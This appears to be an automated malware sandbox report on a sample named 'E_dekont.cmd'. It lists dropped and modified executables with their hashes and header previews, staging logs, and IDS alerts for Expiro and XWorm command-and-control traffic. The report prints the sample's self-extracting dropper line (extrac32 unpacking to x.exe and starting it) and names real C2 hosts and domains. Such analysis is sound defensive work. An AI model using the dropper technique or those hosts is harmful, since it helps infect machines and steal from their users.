                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@....................................,..... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...P.......@...B..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\msiexec.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1199616
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.0839062715811245
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:A4DIXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PIsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:66648D55AF2A2DD37FD39F47097A8BE4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:B5BCCBF131885498A6D14F85BEDE01966317B777
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BD290A56C9CADF695D7381543BF212E7857AEDDE9A70595354E99F225B0644B1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:17554917BEF3F419A4ED7F41A133EEEE0A833A65F15AB478F742E3AF2BEF4DBCCC46CEEDB3578EDFC0E45003F23050D8E916D3AA956F76A0C7205F73133BC469
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@.......................................... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...P...`...@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\snmptrap.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1146880
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.027585232381334
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:b9UXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:xUsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:16010E8846BCE27721A406159D8AE296
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C7FE933FEF534FC24C8104BC0EB9D0202DF65B8B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8E0B0499751277CAE9D48D58C448F3316AE4F46D7C56BACA85D62ABED8F94602
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CE75BF6847A4565774312C8D087B4FB8B27816C4B5475A6EBB7524D5E4DD014CDF0116D27C2E4B6812A883CA2DCDBDF0F7C8725E062837559E798573FC03DB0F
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@....................................M..... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\sppsvc.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5161984
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.256982526436889
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:2CLZqizFGeZV8ppBcq+NFabvy5FEz9AGknGD527BWG:9LDzFGmVWQq+NFarCFUInGVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:562E3D1B4763C6BB49E30F1EBC5A75AB
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:116D5D403459D8D489DE3B2C3343B5E7575DF547
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:069445562782473810BDAEF038872663BFC7E65812B55585A2E19B72B16DF3E7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:045E190F03B150B1F645052BDA6B38FA230EDCDF5CD371497CAD22B3375D00CEDE0646E20A26F2B35C724B5C125EF05BCFDF93A94858D7C97AC9084FBA267704
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u".j1C.91C.91C.9j+.80C.98;89)C.9%(.8(C.9%(.83C.9%(.8"C.91C.9-B.9%(.8.C.9%(.85C.9%(T90C.9%(.80C.9Rich1C.9........PE..d.....}'..........".......:......... ..........@................CS P......... O......3O..................................................... ;C.......E..+....D..z..................PFA.T.....................<.(.....<...............<. ............................text...rs9......t9................. ..`?g_Encry.-....9......x9............. ..`?g_Encry|-....9.......9............. ..`?g_Encry......9..0....9............. ..`?g_Encry.-... :.......:............. ..`.rdata.......P:......2:.............@..@.data...`....`C......>C.............@....pdata...z....D..|....C.............@..@.rsrc....+....E..,...HE.............@..@.reloc...`....E..P...tE.............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\vds.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1303552
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.171615991915963
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:xZ0FxT1UoYr99GdcpKlsqjnhMgeiCl7G0nehbGZpbD:fwWcZDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1F5F8B127B48BA1373FB2B0316C0F221
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:09B1CCA2CD09356D2894E7BAE86B97AC4A03FE77
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4EC402C7C73E94DFD4A464DF0234B03FEAF77D87FE4E6AC097D2FB23FF235009
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:3B92822722DAB5B612D991F3C382F295A9D4DF72D23AD677DE0ED8E772658C3D0DB4FB04BF6CC5FB036BF7A470A7B31CD150ED7886F62E761DFBD69A6D2CD307
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@.......k.... .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\wbem\WmiApSrv.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1339392
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2693290391473075
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:QyoKo2fRple9pWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:QyocJApWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:E04D0C5CE55DF784DD252F53D44EC659
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E5E6223B282DBA5B448B0A57143E02C0EFED61CD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0373A8A02CFAA32C5B6B3E491F6A2A7391EF240B0709D2B8DB68592F2EC3A1A6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:50DABC491EBC15F167B1B5A322BDD6ECD985040492040BCB649FAE92F8C0FCD709917CB97F4F430E4BA665B0A7B5C9DE4E1D27F6D740EABB57D4546E4915F9B8
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@......................................... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc...P...p...@...0..............@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\System32\wbengine.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2164736
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.062075526180567
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:PWcnPqQUGpuphwC0DNLDpaRFXrLuWGMKCIK+Dmg27RnWGj:30zuNI6D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:0090C8857C6EB421F6CB1943A3002648
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:6E0306098A7EA3F46E27ACF2BCB66C6F73382878
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:013CDAA9786CCB68D47FC064D6C17D3ECA10E2F9C68BC02F0EA2568C5234D4E1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EC279AEF9FF390E2D55293DED270605FC1A8BC6849254CDDDC7BAE4C90AFCFE74D304C777C08C3C603C1B2B3881CB0558E63B4C4E3BB1D66BD19F77875B353AA
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!.....o.!... .......... ...............................z......h...|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\Temp\DiagOutputDir\HolographicDevice.etl

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.09987924461109185
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:sMa3l/k/uMclF6vMclFq5zqLNOn+SkUeYDwDzymDj:sMaV/kqF69Fq5zCO+pawHym/
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:6D6F9B4A940AB2D001D21578C5887BC3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:25EC27799338FDC5F64FD684CB8C872592587910
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:20FC299C83E86E9A05D20741F6FA8984A47D5F379C913FCCA25B6621E0E2FDA1
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1653F2654A4E8687372FA596FF27C96387B04686DBA23FD3793B7DAE5B86E4A496B36D3BA19FD5F053F62D4CFDB5622C362D4D1D946F87B31663C9DAD0B0ABFE
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:....`...`.......................................`...!...........................|..........l....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................D.f............Y...,..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P.|..........l....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\Temp\DiagOutputDir\HolographicDeviceHeT.etl

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.1013960852819274
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:Vl6GHg3l/k/uMclF6vMclFq5zqv+NMu3n+SkUeYDwDzyMmpb:Vl6GAV/kqF69Fq5zFX+pawHy1
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:01EBD89DB1CD26286F885775CA5CDD55
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:2A8B7F4302257FBE25CD390AC577A82E89764D0B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E250AFCFE91D059B189CB5ADC476D0B8A24E7B1245D6B04AA6B6C0E97AFCA98A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B770B34353FA0A1AC00578EA05E5D980AD4BB2CEAD181924F1823C0887A3BDC35434E6AFEACB8C454E55B63A68F0D56BF23FB32B63EEAC101A31529BA345F559
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:....h...h.......................................h...!...........................|.......O..l....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................D.f............V...,..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P.|.......O..l............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\Temp\DiagOutputDir\HolographicShell.etl

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.09883303378560836
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:uRz3Nk/uMclF6vMclFq5zqIANIn+SkUeYDwDzy7r:u59kqF69Fq5zdwI+pawHy/
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:ED98A3C721CC3105E391EAB4ECF7DF25
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:68C196F8A2C6D7F3A7699E46985C26040154D6FE
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:90FF6065184A74EC31148BB3E8AB459FC0151CAE1B4DDC703EE8B533099AC263
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CADA33E9E59F8734450520146AC2C7B4EFA8919215BC2C263CD5A4F356B4098D67B2F6E342C3CC748F701676A3231C90FB3020B8358DA2082483711C30948610
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:....X...X.......................................X...!...........................|........N.l....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................D.f...............,..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P.|........N.l............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        \Device\ConDrv

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):592
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.643060201679602
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:qQ/xTzfeSbZ7u0wxDDDDDDDDjCaY5h5aYAlXlTB8NGNJ:X/xTzfp7u0wQakh5azXlt8Nc
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:E599B14F81F9AC80BE28BE42DA97FCBC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:26558C53D68A1702001285F679AE5913F09ACA26
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C36879C37825641187D27CBA7028314E0D4062DFA6FCA347ADF035AB2F6EDD41
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:48A6B3A7F25A338FE0F56D3AC5617015D6E4A2A35A41F8A1A14149EC6429C650DC98A6F101DB0F4E747D31C3F92C0AA1EE3FB7582CE0D031EF3CB62DEE530B89
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\AppData\Local\Temp\x.exe...Destination File: C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x100c00 (1051648) (1 MB)....Total bytes written = 0x101000 (1052672) (1 MB).......Operation completed successfully in 0.94 seconds.....

                                                                                                                                                                                                                                                                                                                                                                                                                        \Device\Null

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):560
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.532578488470501
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNX:/p4xT5cp7u0wQakB4aV4t8Nq
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:3590356B24CBB2F8E508903A82A31479
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:229AF4E5E706A72DD87578DB5148486F39241E86
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:FDFB0F4095DF37BD607F769AC1D645CAED248BC4E251E8B0E76143004F6D7C2A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:FEB02635FD1E447889750296757A6A8ABEA231762F2C4A70ED18A475468975A6F57B88105E7EE6C7A7DC66E6C30E8FC5569FD096BA72368BB177C0723DDECF0D
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.78 seconds.....

                                                                                                                                                                                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                        File type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 33 datablocks, 0 compression
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.894223141204619
                                                                                                                                                                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Microsoft Cabinet Archive (8008/1) 99.91%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
                                                                                                                                                                                                                                                                                                                                                                                                                        File name:E_dekont.cmd
                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'052'051 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:79c1ba6106f6cb367fc280abae110506
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:2656bbcf91b0dd2261a5b9fb44e41539931243ac
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256:09ed171d42a56e9db61a78259695d8d3b2e623348ed2d24dc58745e134997df6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512:2bc16a585d95bd18314bd7b6aae80a41c859f75735a0b2a9f2d0b643bdcb8f3269363e3eefc73677de21478a93dde8469deb1262508d7f3d6d01ca9f4d056ab3
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:GVblKbApOPxyGDvZSAIDX8tHHxbV13los:GV5mBZSAIY5RX
                                                                                                                                                                                                                                                                                                                                                                                                                        TLSH:50259D2635D55A34D133127A6807979C961C3D313E25A06F7DF19F3CFA24A843A2AFA3
                                                                                                                                                                                                                                                                                                                                                                                                                        File Content Preview:MSCF............u.......................!.......cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe".................. .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und

                                                                                                                                                                                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                                                                                                                                                                                        Icon Hash:9686878b929a9886

                                                                                                                                                                                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:16.871535+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:23.955756+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.84970854.244.188.17780TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:23.960930+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.849708TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:23.960930+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.849708TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:28.532789+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.849711TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:28.532789+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.849711TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:28.543237+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.8650931.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:29.931761+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.8615271.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:31.944441+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.8513661.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:32.190942+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.849716TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:34.433751+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.8607701.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:36.310447+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.849731TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:36.310447+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.849731TCP
                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-01T08:23:40.212666+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes162.60.190.1207923192.168.2.849727TCP
